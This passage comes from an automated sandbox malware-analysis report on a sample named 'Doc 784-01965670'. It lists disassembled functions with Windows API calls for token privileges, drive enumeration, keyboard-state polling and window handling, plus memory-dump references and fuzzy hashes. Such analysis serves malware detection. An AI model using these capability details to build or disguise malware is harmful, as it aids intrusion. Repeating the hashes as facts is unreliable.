                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                    • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                    • API String ID: 1446985595-805462909
                                                                                                                                    • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                    • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                    • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                    • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                    Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                    • API String ID: 2907320926-41864084
                                                                                                                                    • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                    • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                    • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                    • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                    Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1932665248-0
                                                                                                                                    • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                    • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                    • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                                                                                                                    • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                    Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                    • _memset.LIBCMT ref: 004481BA
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                    • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                    • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                    • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                    • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                    Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                    • DeleteObject.GDI32(004C0000), ref: 0046EB4F
                                                                                                                                    • DestroyIcon.USER32(004F0046), ref: 0046EB67
                                                                                                                                    • DeleteObject.GDI32(00520000), ref: 0046EB7F
                                                                                                                                    • DestroyWindow.USER32(0047004E), ref: 0046EB97
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 802431696-0
                                                                                                                                    • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                    • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                    • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                    • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                    Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                    • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                                    • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                    • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                                    Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 0-2761332787
                                                                                                                                    • Opcode ID: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
                                                                                                                                    • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                                    • Opcode Fuzzy Hash: a328fc3f0c2738e7ee23a6f39de9db46e7d7486e18f94bdfd929d974c39bc96d
                                                                                                                                    • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                                    Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                                    • _wcslen.LIBCMT ref: 00450944
                                                                                                                                    • _wcscat.LIBCMT ref: 00450955
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                    • String ID: -----$SysListView32
                                                                                                                                    • API String ID: 4008455318-3975388722
                                                                                                                                    • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                    • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                                    • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                    • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                                    Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00448625
                                                                                                                                    • CreateMenu.USER32 ref: 0044863C
                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                                    • IsMenu.USER32(?), ref: 004486EB
                                                                                                                                    • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                                    • DrawMenuBar.USER32 ref: 00448742
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 176399719-4108050209
                                                                                                                                    • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                    • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                    • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                    • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                                    Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                    • GetParent.USER32 ref: 004692A4
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                    • GetParent.USER32 ref: 004692C7
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 2040099840-1403004172
                                                                                                                                    • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                    • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                    • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                    • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                    Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                    • GetParent.USER32 ref: 0046949E
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                    • GetParent.USER32 ref: 004694C1
                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 2040099840-1403004172
                                                                                                                                    • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                    • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                                    • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                    • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                                    Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                                    • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                                    • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                                      • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3771399671-0
                                                                                                                                    • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                    • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                                    • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                    • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                                    Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3413494760-0
                                                                                                                                    • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                                    • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                                    • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                                    • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                                    Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
